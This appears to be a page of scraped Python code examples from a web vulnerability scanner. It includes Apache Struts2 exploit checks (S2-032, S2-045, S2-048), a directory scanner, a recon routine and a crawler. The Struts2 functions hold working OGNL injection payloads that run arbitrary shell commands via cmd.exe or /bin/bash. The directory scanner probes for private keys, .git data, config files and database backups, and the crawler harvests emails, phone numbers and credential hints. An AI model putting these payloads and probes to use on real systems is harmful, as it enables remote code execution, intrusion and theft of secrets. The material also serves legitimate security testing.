        payload = r"/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format(
            self.linux)
        try:
            r = self.req.get(self.url + payload)
            if str(self.random) in r.text and len(r.text) < 11:
                self.result.append('Apache S2-032 Vulnerability: ' + self.url)
        except Exception:
            pass

    def st045(self):
        try:
            cmd = self.linux
            header = dict()
            header[
                "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            header[
                "Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            r = request.Request(self.url, headers=header)
            text = request.urlopen(r).read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except Exception:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-045 Vulnerability: ' + self.url)

    def st048(self):
        cmd = self.linux
        payload = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%[email protected]@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "%27%29.%28%23iswin%3D%[email protected]@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%29.%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&age=123&__cheackbox_bustedBefore=true&description=123"
        payload = payload.encode('utf-8')
        try:
            r = request.urlopen(self.url + '/integration/saveGangster.action',
                                payload)
            text = r.read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except Exception:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-048 Vulnerability: ' + self.url)

    def run(self):
        self.st032()
        self.st045()
        self.st016()
        self.st048()
        return self.result
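A hypothetical run of the four Struts2 checks against one target (placeholder URL); run returns the list of findings accumulated by the individual probes:

if __name__ == '__main__':
    for issue in struts('http://example.com:8080').run():
        print(issue)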
Example No. 28
class DirScan():
    def __init__(self, dbname):
        self.notstr = ''
        self.notlen = ''
        self.goto = ''
        self.title = ''
        self.dbname = dbname
        self.ext = 'asp,php'
        self.outjson = []
        
        self.req = Requests()
    
    def get_urls(self, domain):
        domain = domain.replace('http://', '').replace('https://', '').rstrip('/')
        ext = self.ext.split(',')
        ext = list(map(lambda x: '.' + x, ext))
        path = [
            "/robots.txt", "/README.md", "/crossdomain.xml", "/.git/config",
            "/.hg"
            "/.git/index", "/.svn/entries", "/.svn/wc.db", "/.DS_Store",
            "/CVS/Root", "/CVS/Entries", "/.idea/workspace.xml",
            "/nginx_status", "/.mysql_history", "/login/", "/phpMyAdmin",
            "/pma/", "/pmd/", "/SiteServer", "/admin/", "/Admin/", "/manage",
            "/manager/", "/manage/html", "/resin-admin", "/resin-doc",
            "/axis2-admin", "/admin-console", "/system", "/wp-admin",
            "/uc_server", "/debug", "/Conf", "/webmail", "/service",
            "/memadmin", "/owa", "/harbor", "/master", "/root", "/xmlrpc.php",
            "/phpinfo.php", "/zabbix", "/api", "/backup", "/inc",
            "/web.config", "/httpd.conf", "/local.conf", "/sitemap.xml",
            "/app.config", "/.bash_history", "/.rediscli_history", "/.bashrc",
            "/.history", "/nohup.out", "/.mysql_history", "/server-status",
            "/solr/", "/examples/",
            "/examples/servlets/servlet/SessionExample", "/manager/html",
            "/login.do", "/config/database.yml", "/database.yml", "/db.conf",
            "/db.ini", "/jmx-console/HtmlAdaptor", "/cacti/",
            "/jenkins/script", "/memadmin/index.php", "/pma/index.php",
            "/phpMyAdmin/index.php", "/.git/HEAD", "/.gitignore",
            "/.ssh/known_hosts", "/.ssh/id_rsa", "/id_rsa",
            "/.ssh/authorized_keys", "/app.cfg", "/.mysql.php.swp",
            "/.db.php.swp", "/.database.php.swp", "/.settings.php.swp",
            "/.config.php.swp", "/config/.config.php.swp",
            "/.config.inc.php.swp", "/config.inc.php.bak", "/php.ini",
            "/sftp-config.json", "/WEB-INF/web.xml",
            "/WEB-INF/web.xml.bak", "/WEB-INF/config.xml",
            "/WEB-INF/struts-config.xml", "/server.xml",
            "/config/database.yml", "/WEB-INF/database.properties",
            "/WEB-INF/log4j.properties", "/WEB-INF/config/dbconfig",
            "/fckeditor/_samples/default.html", "/ckeditor/samples/",
            "/ueditor/ueditor.config.js",
            "/javax.faces.resource...%2fWEB-INF/web.xml.jsf", "/wp-config.php",
            "/configuration.php", "/sites/default/settings.php", "/config.php",
            "/config.inc.php", "/data/config.php", "/data/config.inc.php",
            "/data/common.inc.php", "/include/config.inc.php",
            "/WEB-INF/classes/", "/WEB-INF/lib/", "/WEB-INF/src/", "/.bzr",
            "/SearchPublicRegistries.jsp", "/.bash_logout",
            "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile",
            "/test2.html", "/conf.ini", "/index.tar.tz", "/index.cgi.bak",
            "/WEB-INF/classes/struts.xml", "/package.rar",
            "/WEB-INF/applicationContext.xml", "/mysql.php", "/apc.php",
            "/zabbix/", "/script", "/editor/ckeditor/samples/", "/upfile.php",
            "/conf.tar.gz",
            "/WEB-INF/classes/conf/spring/applicationContext-datasource.xml",
            "/output.tar.gz", "/.vimrc", "/INSTALL.TXT", "/pool.sh",
            "/database.sql.gz", "/o.tar.gz", "/upload.sh",
            "/WEB-INF/classes/dataBase.properties", "/b.php", "/setup.sh",
            "/db.php.bak", "/WEB-INF/classes/conf/jdbc.properties",
            "/WEB-INF/spring.xml", "/.htaccess",
            "/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp",
            "/.htpasswd", "/id_dsa", "/WEB-INF/conf/activemq.xml",
            "/config/config.php", "/.idea/modules.xml",
            "/WEB-INF/spring-cfg/applicationContext.xml", "/test2.txt",
            "/WEB-INF/classes/applicationContext.xml",
            "/WEB-INF/conf/database_config.properties",
            "/WEB-INF/classes/rabbitmq.xml",
            "/ckeditor/samples/sample_posteddata.php", "/proxy.pac",
            "/sql.php", "/test2.php", "/build.tar.gz",
            "/WEB-INF/classes/config/applicationContext.xml",
            "/WEB-INF/dwr.xml", "/readme", "/phpmyadmin/index.php",
            "/WEB-INF/web.properties", "/readme.html", "/key"
        ]
        leaks = Cartesian()
        leaks.add_data([
            '/www', '/1', '/2016', '/2017', '/2018', '/2019', '/wwwroot',
            '/backup', '/index', '/web', '/test', '/tmp', '/default', '/temp',
            '/extra', '/file', '/qq', '/up', '/config', '/' + domain
        ])
        leaks.add_data([
            '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar', '.txt',
            '.log', '.tmp', '.gz', '.bak~', '.sh'
        ])
        path.extend(leaks.build())
        index = Cartesian()
        index.add_data([
            '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q',
            '/shell', '/p', '/a', '/userinfo', '/api', '/common', '/web',
            '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma', '/66'
        ])
        index.add_data(ext)
        path.extend(index.build())
        return set(path)
    
    def diff(self, text):
        result = difflib.SequenceMatcher(None, self.notstr, text).quick_ratio()
        return result
    
    def _verify(self, r, goto, title):
        result = True
        if r.status_code in BLOCK_CODE:
            result = False
        if r.headers['Content-Type'] in BLOCK_CONTYPE:
            result = False
        if len(r.text) == self.notlen:
            result = False
        if goto == self.goto:
            result = False
        for i in PAGE_404:
            if i in r.text:
                result = False
                break
        if title == self.title and title != 'None':
            result = False
        return result
    
    def check404(self, url):
        # Request a random page to record the 404 page's length and content
        key = str(random.random() * 100)
        random_url = base64.b64encode(key.encode('utf-8'))
        url = url + '/' + random_url.decode(
            'utf-8') + '.html'
        try:
            r = self.req.get(url)
            self.notstr = r.text[:10000]
            self.notlen = len(r.text)
            if r.is_redirect:
                self.goto = r.headers['Location']
        except Exception as e:
            logging.exception(e)
    
    def scan(self, host):
        try:
            r = self.req.get(host)
            if r.is_redirect:
                goto = r.headers['Location']
            else:
                goto = 'test'
            if r.headers.get('Content-Type'):
                contype = re.sub(r'\w+/', '', str(r.headers.get('Content-Type')))
                contype = re.sub(r';.*', '', contype)
            else:
                contype = 'None'
            text = r.text[:10000]
            title = re.search('(?<=<title>).*(?=</title>)', text)
            if self._verify(r, goto, title):
                if contype == 'html':
                    result = self.diff(text)
                else:
                    result = 0
                if result < 0.8:
                    if title is None:
                        title = 'None'
                    else:
                        title = title.group()
                    title = re.sub(r'\n|\t', '', title)
                    urlresult = parse.urlparse(host)
                    sys.stdout.write(bcolors.OKGREEN + '[+] {}{:^12}{:^14}\t{:^18}\t{:^8}\n'.format(
                        r.status_code, len(r.text), title, contype, str(r.url)) + bcolors.ENDC)
                    data = {
                        urlresult.netloc: {
                            "rsp_code": r.status_code,
                            "rsp_len": len(r.text),
                            "title": title,
                            "contype": contype,
                            "url": urlresult.path
                        }
                    }
                    self.outjson.append(data)
        except Exception:
            pass
        return 'OK'
    
    def save(self, urls):
        Sqldb(self.dbname).get_urls(urls)
    
    def run(self, task):
        print(bcolors.RED + 'URLS:' + bcolors.ENDC)
        with concurrent.futures.ThreadPoolExecutor(
            max_workers=THREADS) as executor:
            futures = [executor.submit(self.scan, i) for i in task]
            for future in concurrent.futures.as_completed(futures):
                future.result()
        self.save(self.outjson)
    
    # Build and launch the scan tasks
    def pool(self, host):
        self.check404(host)
        task = []
        urls = self.get_urls(host)
        for url in urls:
            task.append(host + url)
        self.run(task)
Example No. 29
def start(url):
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
    sys.stdout.write(bcolors.RED + 'Host: ' + host + '\n' + bcolors.ENDC)
    sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
    address = geoip(ipaddr)
    try:
        # Check whether the main domain is reachable
        req = Requests()
        r = req.get(url)
    except Exception:
        pass
    if 'r' in locals().keys():
        wafresult = checkwaf(host)
        try:
            coding = chardet.detect(r.content).get('encoding')
            r.encoding = coding
            webinfo = (WebPage(r.url, r.text, r.headers).info())
        except Exception as e:
            webinfo = {}
        if webinfo:
            sys.stdout.write(bcolors.RED + "Webinfo:\n" + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN +
                             '[+] Title: {}\n'.format(webinfo.get('title')) +
                             bcolors.ENDC)
            sys.stdout.write(
                bcolors.OKGREEN +
                '[+] Fingerprint: {}\n'.format(webinfo.get('apps')) +
                bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN +
                             '[+] Server: {}\n'.format(webinfo.get('server')) +
                             bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN +
                             '[+] WAF: {}\n'.format(wafresult) + bcolors.ENDC)
    else:
        webinfo = {}
        wafresult = 'None'
    pdns = virustotal(host)
    reverseip = reverse_domain(host)
    webinfo.update({"pdns": pdns})
    webinfo.update({"reverseip": reverseip})
    if iscdn(host):
        open_port = ScanPort(url).pool()
    else:
        open_port = ['CDN:0']
    osname = osdetect(host)
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    web_save(data)
    Vuln(host, open_port, webinfo.get('apps')).run()
    if 'r' in locals().keys() and not SCANDIR:
        dirscan = DirScan('result')
        dirscan.pool(url)
Example No. 30
class Crawl:
    def __init__(self, host, dbname):
        self.urls = []
        self.js = []
        self.domain = ''
        self.dbname = dbname
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        try:
            html = etree.HTML(r.text)
            result = html.xpath('//script/@src')
            for i in result:
                if not re.search(
                        r'jquery|bootstrap|adsbygoogle|angular|javascript|#|vue|react|51.la/=|map\.baidu\.com|canvas|cnzz\.com|slick\.js|autofill-event\.js|tld\.js|clipboard|Chart\.js',
                        i):
                    if '://' not in i:
                        i = re.sub(r'^/|^\.\./', '', i)
                        i = self.host + '/' + i
                    self.js.append(i)
        except (AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

    def extr(self, url, body):
        # Extract email addresses from the HTML page
        email = re.findall(
            r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body)
        if email:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Email: ' + x, email)))
        # Extract phone numbers from the HTML page
        phone = re.findall(
            r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b',
            body)
        if phone:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Phone: ' + x, phone)))
        # Extract IP addresses from HTML comments
        ipaddr = re.findall(
            r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)',
            body)
        if ipaddr:
            self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr)))
        # Extract http(s) links from HTML comments
        links = re.findall(
            r'(?<=<!--).{0,120}((?:http|https):[\w\./\?\-=&]+).{0,120}(?=-->)',
            body)
        if links:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Links: ' + x, links)))
        # Extract <a href> links from HTML comments
        links2 = re.findall(
            r'(?<=<!--).{0,120}a\shref="([\-\w\.\?:=\&/]+)".{0,120}(?=-->)',
            body)
        if links2:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Links: ' + x, links2)))
        links3 = re.findall(
            r'(?<=<!--).{0,120}\b(?:usr|pwd|uname|uid|file|upload|manager|webadmin|backup|account|admin|password|pass|user|login|secret|private|crash|root|xxx|fix|todo|secret_key|token|auth_token|access_token|username|authkey|user_id|userid|apikey|api_key|sid|eid|passwd|session_key|SESSION_TOKEN|api_token|access_token_secret|private_key|DB_USERNAME|oauth_token|api_secret_key|备注|笔记|备份|后台|登陆|管理|上传|下载|挂马|挂链)\b.{0,120}(?=-->)',
            body)
        if links3:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Links: ' + x, links3)))

    def parse_html(self, host):
        try:
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.url, r.text)
            urlparse = parse.urlparse(host)
            domain = urlparse.netloc
            if not self.domain:
                self.domain = domain
            html = etree.HTML(r.text)
            result = html.xpath('//a/@href')
            for link in result:
                if not re.search('#|mail*|^/$|javascript', link):
                    if 'http' not in link:
                        if urlparse.netloc:
                            link = urlparse.scheme + '://' + urlparse.netloc + '/' + link
                        else:
                            link = 'http://' + host + '/' + link
                    if domain in link:
                        if '=' not in link:
                            self.urls.append(link)
        except (UnboundLocalError, AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

        self.urls = dedup_url(self.urls)

        return list(set(self.urls))

    def pool(self):
        result = self.parse_html(self.host)
        try:
            with concurrent.futures.ThreadPoolExecutor(
                    max_workers=30) as executor:
                futures = [executor.submit(self.parse_html, i) for i in result]
                for future in concurrent.futures.as_completed(futures,
                                                              timeout=3):
                    future.result()
        except (EOFError, concurrent.futures._base.TimeoutError):
            pass
        except Exception as e:
            logging.exception(e)

        jslink = JsLeaks().pool(self.js)

        self.result.extend(jslink)
        self.result = list(set(self.result))

        for i in self.result:
            console('Crawl', self.host, i + '\n')

        Sqldb(self.dbname).get_crawl(self.domain, self.result)